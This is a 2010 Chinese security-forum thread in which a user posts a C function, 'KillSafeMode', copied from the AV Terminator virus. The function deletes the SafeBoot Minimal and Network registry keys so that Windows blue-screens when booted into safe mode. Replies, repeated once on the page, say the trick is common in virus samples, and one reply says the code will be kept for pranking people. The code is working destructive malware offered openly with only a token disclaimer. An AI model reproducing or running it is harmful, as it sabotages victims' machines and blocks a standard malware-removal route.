[原创]破坏安全模式-编程技术-看雪-安全社区|安全招聘|kanxue.com

[原创]破坏安全模式

发表于: 2010-1-25 10:19 6130

[原创]破坏安全模式

luanx

2010-1-25 10:19

6130

by:乱雪
hi.baidu.com/lu4nx
参考AV终结者写的一个小函数，直接删注册表的内容，方法很简单，不过网上很少看到有这方面的资料，恢复起来也容易：）

/*
 
破坏安全模式,by:乱雪
 
2010.1.24
 
警告:仅用于技术学习使用,禁止使用到非法用途.
 
说明:直接通过删除注册表里关键子键达到无法进入安全模式的目的,一进安全模式就蓝屏,参考AV终结者的功能写的.
 
*/
 
VOID KillSafeMode()
{
HKEY hKey[5];
::RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\ControlSet001\\Control\\SafeBoot\\Minimal",&hKey[1]);
::RegDeleteKey(hKey[1],"{4D36E967-E325-11CE-BFC1-08002BE10318}");
 
::RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\ControlSet001\\Control\\SafeBoot\\Network",&hKey[2]);
::RegDeleteKey(hKey[2],"{4D36E967-E325-11CE-BFC1-08002BE10318}");
 
::RegOpenKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal",&hKey[3]);
::RegDeleteKey(hKey[3],"{4D36E967-E325-11CE-BFC1-08002BE10318}");
 
::RegOpenKey(HKEY_LOCAL_MACHINE,"CurrentControlSet\\Control\\SafeBoot\\Network",&hKey[4]);
::RegDeleteKey(hKey[4],"{4D36E967-E325-11CE-BFC1-08002BE10318}");
 
::RegCloseKey(hKey[1]);
::RegCloseKey(hKey[2]);
::RegCloseKey(hKey[3]);
::RegCloseKey(hKey[4]);
}

[注意]看雪招聘，专注安全领域的专业人才平台！

收藏・1

支持

最新回复 (14)
yasm 雪币： 72 活跃值： (10) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 165 粉丝 0 关注私信	yasm 2 楼转载了，支持一下。 2010-1-25 12:59 0
riusksk 雪币： 433 活跃值： (1890) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 269 关注私信	riusksk 41 3 楼飘过留名！！！ 2010-1-25 13:01 0
qihoocom 雪币： 635 活跃值： (101) 能力值： ( LV12，RANK：420 ) 在线值：发帖 49 回帖 1165 粉丝 25 关注私信	qihoocom 9 4 楼我吐了 2010-1-25 14:28 0
轩辕小聪雪币： 722 活跃值： (123) 能力值： ( LV12，RANK：300 ) 在线值：发帖 10 回帖 547 粉丝 5 关注私信	轩辕小聪 7 5 楼网上比较少这方面的内容？LZ开玩笑吧，我看过的病毒样本里有这一段的都不知道多少个了，熊猫烧香以前就有人用的招 2010-1-25 14:33 0
luanx 雪币： 180 活跃值： (76) 能力值： ( LV3，RANK：20 ) 在线值：发帖 3 回帖 23 粉丝 0 关注私信	luanx 6 楼是么？我还真没注意过- -我也是在病毒样本里看到的 2010-1-25 14:42 0
轩辕小聪雪币： 722 活跃值： (123) 能力值： ( LV12，RANK：300 ) 在线值：发帖 10 回帖 547 粉丝 5 关注私信	轩辕小聪 7 7 楼你自己都说参考AV终结者了，那是哪年哪月的东西了 2010-1-25 14:45 0
luanx 雪币： 180 活跃值： (76) 能力值： ( LV3，RANK：20 ) 在线值：发帖 3 回帖 23 粉丝 0 关注私信	luanx 8 楼那是因为自己在写时想到了AV终结者有这个功能哈哈因为对它的印象深一点 2010-1-25 14:48 0
myloved 雪币： 205 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 41 粉丝 0 关注私信	myloved 9 楼呵呵，手动删除注册表所有内容，破坏整个系统... 2010-1-25 19:52 0
riusksk 雪币： 433 活跃值： (1890) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 269 关注私信	riusksk 41 10 楼淡定淡定…… 2010-1-26 00:08 0
雪妖雪币： 266 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 168 粉丝 0 关注私信	雪妖 11 楼留一份吧以后整人用得着 2010-1-26 09:40 0
jerrynpc 雪币： 284 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 695 粉丝 0 关注私信	jerrynpc 12 楼膜拜乱雪大黑客ing.... 2010-1-26 10:19 0
luckxiao 雪币： 279 活跃值： (14) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 284 粉丝 1 关注私信	luckxiao 13 楼你吐吧，牛人有权鄙视菜鸟的一切！ 2010-1-26 12:02 0
onepc 雪币： 109 活跃值： (10) 能力值： ( LV3，RANK：20 ) 在线值：发帖 26 回帖 157 粉丝 0 关注私信	onepc 14 楼那位介绍下lz 2010-1-26 13:41 0
tgs 雪币： 230 活跃值： (32) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 29 粉丝 0 关注私信	tgs 15 楼记得在网吧看见过台机器直接修改的NTLDR 转入正常模式了 2010-1-26 16:08 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

luanx

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (14)
yasm 雪币： 72 活跃值： (10) 能力值： ( LV3，RANK：20 ) 在线值：发帖 4 回帖 165 粉丝 0 关注私信	yasm 2 楼转载了，支持一下。 2010-1-25 12:59 0
riusksk 雪币： 433 活跃值： (1890) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 269 关注私信	riusksk 41 3 楼飘过留名！！！ 2010-1-25 13:01 0
qihoocom 雪币： 635 活跃值： (101) 能力值： ( LV12，RANK：420 ) 在线值：发帖 49 回帖 1165 粉丝 25 关注私信	qihoocom 9 4 楼我吐了 2010-1-25 14:28 0
轩辕小聪雪币： 722 活跃值： (123) 能力值： ( LV12，RANK：300 ) 在线值：发帖 10 回帖 547 粉丝 5 关注私信	轩辕小聪 7 5 楼网上比较少这方面的内容？LZ开玩笑吧，我看过的病毒样本里有这一段的都不知道多少个了，熊猫烧香以前就有人用的招 2010-1-25 14:33 0
luanx 雪币： 180 活跃值： (76) 能力值： ( LV3，RANK：20 ) 在线值：发帖 3 回帖 23 粉丝 0 关注私信	luanx 6 楼是么？我还真没注意过- -我也是在病毒样本里看到的 2010-1-25 14:42 0
轩辕小聪雪币： 722 活跃值： (123) 能力值： ( LV12，RANK：300 ) 在线值：发帖 10 回帖 547 粉丝 5 关注私信	轩辕小聪 7 7 楼你自己都说参考AV终结者了，那是哪年哪月的东西了 2010-1-25 14:45 0
luanx 雪币： 180 活跃值： (76) 能力值： ( LV3，RANK：20 ) 在线值：发帖 3 回帖 23 粉丝 0 关注私信	luanx 8 楼那是因为自己在写时想到了AV终结者有这个功能哈哈因为对它的印象深一点 2010-1-25 14:48 0
myloved 雪币： 205 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 41 粉丝 0 关注私信	myloved 9 楼呵呵，手动删除注册表所有内容，破坏整个系统... 2010-1-25 19:52 0
riusksk 雪币： 433 活跃值： (1890) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 269 关注私信	riusksk 41 10 楼淡定淡定…… 2010-1-26 00:08 0
雪妖雪币： 266 活跃值： (15) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 168 粉丝 0 关注私信	雪妖 11 楼留一份吧以后整人用得着 2010-1-26 09:40 0
jerrynpc 雪币： 284 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 18 回帖 695 粉丝 0 关注私信	jerrynpc 12 楼膜拜乱雪大黑客ing.... 2010-1-26 10:19 0
luckxiao 雪币： 279 活跃值： (14) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 284 粉丝 1 关注私信	luckxiao 13 楼你吐吧，牛人有权鄙视菜鸟的一切！ 2010-1-26 12:02 0
onepc 雪币： 109 活跃值： (10) 能力值： ( LV3，RANK：20 ) 在线值：发帖 26 回帖 157 粉丝 0 关注私信	onepc 14 楼那位介绍下lz 2010-1-26 13:41 0
tgs 雪币： 230 活跃值： (32) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 29 粉丝 0 关注私信	tgs 15 楼记得在网吧看见过台机器直接修改的NTLDR 转入正常模式了 2010-1-26 16:08 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[原创]破坏安全模式

账号登录 验证码登录

账号登录

验证码登录